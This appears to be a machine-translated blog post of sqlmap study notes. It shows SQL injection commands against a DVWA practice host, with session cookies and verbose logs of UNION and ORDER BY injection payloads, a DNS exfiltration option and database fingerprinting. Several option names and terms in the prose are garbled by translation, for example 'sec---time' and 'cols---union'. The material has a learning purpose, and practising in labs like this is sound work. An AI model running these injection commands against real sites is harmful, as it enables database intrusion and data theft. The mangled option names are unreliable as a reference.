Sqlmap study notes (d)

Others 2019-12-10 20:56:05 views: null

Specifies the injection technique

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique="BEUSTQ"

B : Based on the type of blind Boolean

E : Based on the error injection

U : joint inquiry injection

S : stacking injection

T : Blind Time Note

Q : Inline queries injection

All injection technique is used by default, --technique = "BEUSTQ"

Set the time parameters of the blinds

sec---time : Set the time delay based on blind, in seconds, five seconds by default

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --technique=T --time-sec=1

Joint injection parameters

cols---union : Set the number of columns joint injection, the default columns 1-10. Although by increasing the --level can increase the number of columns, but can --union-cols can set the number of fixed columns. For example: Set union test as 12-18

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-cols="12-18"

char---union : Set the character union injection, the default is NULL. When you set a higher level of level, it will be tested using a random number, because in some cases, union queries NULL test will fail, and a random number will be successful. For example: to set union of characters "123"

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-char="123" -v 3

As a union using 123 characters, the default query columns 1-10

[22:19:32] [PAYLOAD] -9103) ORDER BY 1-- JliU
[22:19:32] [PAYLOAD] -6117) ORDER BY 4864-- XFDV
[22:19:32] [PAYLOAD] -5546) UNION ALL SELECT 123-- ueOQ
[22:19:32] [PAYLOAD] -8136) UNION ALL SELECT 123,123-- ksax
[22:19:33] [PAYLOAD] -6350) UNION ALL SELECT 123,123,123-- UHzH
[22:19:33] [PAYLOAD] -4218) UNION ALL SELECT 123,123,123,123-- rbVp
[22:19:33] [PAYLOAD] -1370) UNION ALL SELECT 123,123,123,123,123-- iprn
[22:19:33] [PAYLOAD] -5507) UNION ALL SELECT 123,123,123,123,123,123-- Inhq
[22:19:33] [PAYLOAD] -9862) UNION ALL SELECT 123,123,123,123,123,123,123-- IwGO
[22:19:33] [PAYLOAD] -5351) UNION ALL SELECT 123,123,123,123,123,123,123,123-- EdWF
[22:19:33] [PAYLOAD] -3384) UNION ALL SELECT 123,123,123,123,123,123,123,123,123-- ThkG
[22:19:33] [PAYLOAD] -6285) UNION ALL SELECT 123,123,123,123,123,123,123,123,123,123-- vyBV

from---union : injection union set table to be queried, provided as users table as a table to be queried union injection

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=at551473drbanmtonl0lurivhc; security=low" --technique=U --union-from="users" -v 3

The default query string to use NULL, the query range of 1-10, the designated table users

[22:27:16] [PAYLOAD] 1) ORDER BY 1-- Vrdu
[22:27:16] [WARNING] reflective value(s) found and filtering out
[22:27:16] [PAYLOAD] 1) ORDER BY 6196-- MvfX
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL FROM users-- cmox
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL FROM users-- FwKo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL FROM users-- fmaB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL FROM users-- MuVY
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL FROM users-- Wijp
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL FROM users-- wYUU
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- rWYB
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LvGo
[22:27:16] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- LnTt
[22:27:17] [PAYLOAD] 1) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users-- YGVF

DNS attacks against

-Domain - DNS : DNS server by specifying the target attacks, dns service the needs of the target open 53 ports.

sqlmap -u "目标URL" --dns-domain="目标URL"

Obtain fingerprint information database

-f or --fingerprint

sqlmap -u "http://test.dvwa.com/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=8jh3juigrkaqipeu1oiinhcpbi; security=low" -f

Thus, the database is Mysql, the version number is 5.7

[20:15:10] [INFO] testing MySQL
[20:15:10] [INFO] confirming MySQL
[20:15:11] [INFO] the back-end DBMS is MySQL
[20:15:11] [INFO] actively fingerprinting MySQL
[20:15:11] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
               comment injection fingerprint: MySQL 5.7.26
               html error message fingerprint: MySQL

Guess you like

Origin www.cnblogs.com/dagger9527/p/12013878.html
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com